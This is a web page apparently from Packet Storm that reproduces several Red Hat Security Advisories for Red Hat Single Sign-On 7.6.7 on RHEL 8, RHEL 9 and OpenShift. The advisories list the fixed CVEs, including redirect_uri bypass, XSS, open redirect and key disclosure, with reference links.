capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.7 serves as a replacement for Red Hat Single Sign-On 7.6.6, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6291)* guava: insecure temporary directory creation (CVE-2023-2976)* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6134)* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)* Log Injection during WebAuthn authentication or registration (CVE-2023-6484)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:CVE-2023-2976References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2215229https://bugzilla.redhat.com/show_bug.cgi?id=2236340https://bugzilla.redhat.com/show_bug.cgi?id=2236341https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://bugzilla.redhat.com/show_bug.cgi?id=2248423https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0804-03

Red Hat Security Advisory 2024-0801-03 - A new image is available for Red Hat Single Sign-On 7.6.7, running on OpenShift Container Platform 3.10 and 3.11, and 4.3. Issues addressed include bypass, cross site scripting, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0801.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.7 for OpenShift image enhancement updateAdvisory ID:        RHSA-2024:0801-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0801Issue date:         2024-02-14Revision:           03CVE Names:          CVE-2023-2976====================================================================Summary: A new image is available for Red Hat Single Sign-On 7.6.7, running on OpenShift Container Platform 3.10 and 3.11, and 4.3.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On is an integrated sign-on solution, available as aRed Hat JBoss Middleware for OpenShift containerized image. The Red HatSingle Sign-On for OpenShift image provides an authentication server thatyou can use to log in centrally, log out, and register. You can also manageuser accounts for web applications, mobile applications, and RESTful webservices.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6291)* guava: insecure temporary directory creation (CVE-2023-2976)* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6134)* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)* Log Injection during WebAuthn authentication or registration (CVE-2023-6484)This erratum releases a new image for Red Hat Single Sign-On 7.6.7 for use within the OpenShift Container Platform 3.10, OpenShift Container Platform3.11, and within the OpenShift Container Platform 4.3 cloud computing Platform-as-a-Service (PaaS) for on-premise or private cloud deployments, aligning with the standalone product release.Solution:https://raw.githubusercontent.com/jboss-container-images/redhat-sso-7-openshift-image/v7.6.7.GA/templates/${resource}CVEs:CVE-2023-2976References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2215229https://bugzilla.redhat.com/show_bug.cgi?id=2236340https://bugzilla.redhat.com/show_bug.cgi?id=2236341https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://bugzilla.redhat.com/show_bug.cgi?id=2248423https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0801-03

Red Hat Security Advisory 2024-0800-03 - New Red Hat Single Sign-On 7.6.7 packages are now available for Red Hat Enterprise Linux 9. Issues addressed include bypass, cross site scripting, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0800.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.7 security update on RHEL 9Advisory ID:        RHSA-2024:0800-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0800Issue date:         2024-02-14Revision:           03CVE Names:          CVE-2023-2976====================================================================Summary: New Red Hat Single Sign-On 7.6.7 packages are now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.7 on RHEL 9 serves as a replacement for Red Hat Single Sign-On 7.6.6, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6291)* guava: insecure temporary directory creation (CVE-2023-2976)* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6134)* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)* Log Injection during WebAuthn authentication or registration (CVE-2023-6484)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-2976References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2215229https://bugzilla.redhat.com/show_bug.cgi?id=2236340https://bugzilla.redhat.com/show_bug.cgi?id=2236341https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://bugzilla.redhat.com/show_bug.cgi?id=2248423https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2255027

Red Hat Security Advisory 2024-0800-03

Red Hat Security Advisory 2024-0799-03 - New Red Hat Single Sign-On 7.6.7 packages are now available for Red Hat Enterprise Linux 8. Issues addressed include bypass, cross site scripting, and open redirection vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0799.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: Red Hat Single Sign-On 7.6.7 security update on RHEL 8Advisory ID:        RHSA-2024:0799-03Product:            Red Hat Single Sign-OnAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0799Issue date:         2024-02-14Revision:           03CVE Names:          CVE-2023-2976====================================================================Summary: New Red Hat Single Sign-On 7.6.7 packages are now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Single Sign-On 7.6 is a standalone server, based on the Keycloak project, that provides authentication and standards-based single sign-on capabilities for web and mobile applications.This release of Red Hat Single Sign-On 7.6.7 on RHEL 8 serves as a replacement for Red Hat Single Sign-On 7.6.6, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.Security Fix(es):* redirect_uri validation logic that allows for a bypass of otherwise explicitly allowed hosts (CVE-2023-6291)* guava: insecure temporary directory creation (CVE-2023-2976)* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)* reflected XSS via wildcard in OIDC redirect_uri (CVE-2023-6134)* open redirect via \"form_post.jwt\" JARM response mode (CVE-2023-6927)* santuario: Private Key disclosure in debug-log output (CVE-2023-44483)* Log Injection during WebAuthn authentication or registration (CVE-2023-6484)3-44483)For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-2976References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2215229https://bugzilla.redhat.com/show_bug.cgi?id=2236340https://bugzilla.redhat.com/show_bug.cgi?id=2236341https://bugzilla.redhat.com/show_bug.cgi?id=2246070https://bugzilla.redhat.com/show_bug.cgi?id=2248423https://bugzilla.redhat.com/show_bug.cgi?id=2249673https://bugzilla.redhat.com/show_bug.cgi?id=2251407https://bugzilla.redhat.com/show_bug.cgi?id=2255027

Tag

#auth